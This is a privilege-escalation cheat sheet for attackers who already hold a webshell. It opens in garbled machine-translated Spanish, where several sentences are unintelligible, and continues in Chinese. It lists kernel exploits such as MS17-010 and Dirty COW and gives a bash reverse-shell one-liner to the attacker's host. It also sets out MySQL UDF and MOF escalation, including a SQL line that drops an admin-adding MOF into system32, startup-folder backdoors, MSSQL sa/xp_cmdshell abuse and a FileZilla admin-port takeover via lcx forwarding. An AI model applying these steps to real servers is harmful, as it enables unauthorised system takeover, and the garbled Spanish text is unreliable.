penetración de la red - una escalada de privilegios

Mencionar el propósito correcto:

A veces, el acceso para ejecutar comandos shell de alguna manera (tales como la carga WebShell), pero debido a las restricciones de derechos y no puede ejecutar ciertos comandos. Esta vez con el fin de "Construir sobre" el derecho a hablar de la necesidad de utilizar para hacer los bajos de los derechos originales (por ejemplo, permitiendo que sólo un listado de directorios) -> autoridad superior (con la posibilidad de modificar el archivo).

Hablar de la manera correcta :

vulnerabilidad de elevación local de privilegios

Base de datos de elevación de privilegios

El software de terceros proporciona la derecha

Locales ventanas de vulnerabilidad de elevación de privilegios:

privilegios locales vulnerabilidades de escalada de servicio:

iis6 IIS5 (https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2009/ms09-020)

ftp (servicio FTP propio permiso necesario es alto, ftp, Serv-U FTP, g6ftp, etc.)

SMB (MS17-010) --- mucho éxito en el marco de MSF que se puede devolver a la normalidad cmdshell

RPC (MS08-067)

la vulnerabilidad de elevación de privilegios del sistema del kernel
del sistema Windows local escalada de privilegios:

Recopilar información de la actualización:	información del sistema
Por el contrario el número de parche systeminfo, en busca de exp.
Exp necesidad de ser cargado en el servidor:	Sube a. carga sitio web La presencia de cualquier directorio de archivos ejecutables de lectura-escritura sitio del usuario windows2003 La basura RECICLADOR Windows2008 C: \ Windows \ Temp \

elevación local de privilegios vulnerabilidades de Linux :

A juzgar versión del sistema:

uname (Linux kernel del sistema operativo de visualización de información) cat / proc / version (sistema operativo Linux para ver la información de la versión actual) cat / etc / issue o cat / etc / redhat-release (versión Linux del sistema operativo actual para ver la información de la liberación) Después de la versión del kernel juzgado, fue exp, a continuación, cargar y compilar y ejecutar Obtener un shell interactivo (puerto de rebote fiesta de -i> y / dev / tcp / ip de su / propio puerto 0> & 1

Sube compilar:

Lectura-escritura ejecutables directorio / tmp     gcc exp.c –o exp   或者有的需要加编译选项：例如脏牛漏洞的 gcc -pthread dirty.c -o dirty -lcrypt

数据库提权mysql：

利用MySQL提权原理

具有mysql的root权限，且mysql以system权限运行 具有执行sql语句的权限，webshell或者外连皆可

UDF提权：

UDF：	是mysql的一个拓展接口，UDF（Userdefined function）可翻译为用户自定义函数，这个是用来拓展Mysql的技术手段。
原理：	UDF可以理解为MySQL的函数库，可以利用UDF定义创建函数。（其中包括了执行系统命令的函数） 要想利用udf，必须上传udf.dll作为udf的执行库。 mysql中支持UDF扩展 ，使得我们可以调用DLL里面的函数来实现一些特殊的功能。
注意事项：	1、判断mysql版本 mysql版本 < 5.1 , UDF导出到系统目录c:/windows/system32/ mysql版本 > 5.1 ，UDF导出到安装路径MySQL\Lib\Plugin\ 2、再mysql里输入 select @@basedir show variables like ‘%plugin%’   寻找mysql安装路径 该目录默认是不存在的，这就需要我们使用webshell找到MYSQL的安装目录，并在安装目录下创建lib\plugin文件夹，然后将udf.dll文件导出到该目录即可。
流程：	导出DLL 创建用户自定义函数

MySQL数据库-开机启动项提权：

原理：	利用mysql，将后门写入开机自启动项。同时因为是开机自启动，再写入之后，需要重启目标服务器。(这个要求mysql的权限就很高，至少是管理员权限甚至是system
目录：	C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 或者C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\（windows2003及xp的路径）

MOF提权：

提权原理：	mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp.exe编译执行。
流程	1、 首先找个可写的目录，将我们的MOF文件上传上去。 2、 执行以下sql语句，mof文件内的命令便会执行。 select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof' 注：仅适用于windows系统。 3、利用2进制转换16进制完成。

MSSQL提权-sa用户：

• 所谓利用数据进行提权，利用的其实是数据库的运行权限，所以只要我们满足以下条件即可进行提权：

1、 必须获得sa的账号密码或者与sa相同权限的账号密码，且mssql没有被降权。

2、 必须可以以某种方式执行sql语句，例如：webshell或者是1433端口的连接。

3、能够通过配置文件找到系统的登录账户密码

过程：

MSSQL在Windows server类的操作系统上，默认具有system权限。System权限在Windows server2003中权限仅比管理员小；而在2003以上的版本，则为最高权限。

获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码（某些站点直接在web应用程序中使用sa连接数据库），一般情况下，.net的站点数据库连接字符串在web.config或者和global.aspx也有可能是编译在DLL文件当中。

通过端口扫描查看1433（mssql默认端口）是否对外开放。如果对外开放则使用sql连接器进行提权，如果没有对外开放，则使用webshell自带的mssql数据库连接功能连接至mssql数据库。

Sa作为mssql的默认最高权限的账户，在正常情况下，可以通过xp_cmdshell等方式执行系统命令。

第三软件提权：

Filezilla：	FileZilla是一个免费开源的FTP软件，分为客户端版本和服务器版本，具备所有的FTP软件功能。可控性、有条理的界面和管理多站点的简化方式使得Filezilla客户端版成为一个方便高效的FTP客户端工具，而FileZilla Server则是一个小巧并且可靠的支持FTP&SFTP的FTP服务器软件。 Filezilla和普通Web网站一样，前台有普通FTP账户执行上传、下载、删除等动作，后台则有一个管理员控制台来设置前台的账户以及账户的权限。 前台就是21端口，而后台默认是14147端口。我们的提权方式就是，直接非法连接14147端口，非法登录远程的Filezilla，创建一个拥有全部硬盘目录权限的FTP账户。
查看系统运行的软件：	tasklist：                 FileZilla Server exe
端口转发：	Lcx.exe工具：                           Lcx.exe  -tran     对外开放端口     转发的ip   转发的端口                           Lcx.exe –tran 14148  127.0.0.1 14147